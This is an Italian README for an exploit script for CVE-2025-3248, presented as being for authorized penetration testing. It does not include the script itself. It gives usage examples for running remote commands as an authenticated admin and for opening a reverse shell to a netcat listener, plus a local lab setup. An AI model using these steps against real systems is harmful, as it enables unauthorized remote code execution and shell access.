
Questo script Python sfrutta la CVE-2025-3248 per eseguire comandi arbitrari o generare una reverse shell su un sistema vulnerabile. Per utilizzare questo exploit è richiesta l'autenticazione.
Questo script Python sfrutta CVE-2025-3248 per eseguire comandi arbitrari o avviare una reverse shell su un sistema vulnerabile. L'autenticazione è richiesta per utilizzare questo exploit.
requestsInstalla le dipendenze con:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Argomento | Descrizione | Obbligatorio |
|---|---|---|
-u, --url | URL di base del target (es. https://target.com) | Sì |
-l, --login | Nome utente admin | Sì |
-p, --password | Password admin | Sì |
-c, --command | Comando da eseguire sul target | No* |
--proxy | URL del proxy (es. http://127.0.0.1:8080) | No |
--lhost | Host locale per la reverse shell | No* |
--lport | Porta locale per la reverse shell | No* |
* Devi specificare o un comando (-c) o entrambi --lhost e --lport per una reverse shell.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Avvia un listener sulla tua macchina:
nc -lvnp 4444
Quindi esegui:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Puoi distribuire l'immagine Docker usando il seguente comando:
podman compose up -d
L'immagine sarà disponibile all'indirizzo http://localhost:7860.
Crediti per il file compose: Questo repository
Questo script è solo per scopi educativi e di test di penetrazione autorizzati. Non usarlo contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testare.
Questa readme è generata da IA.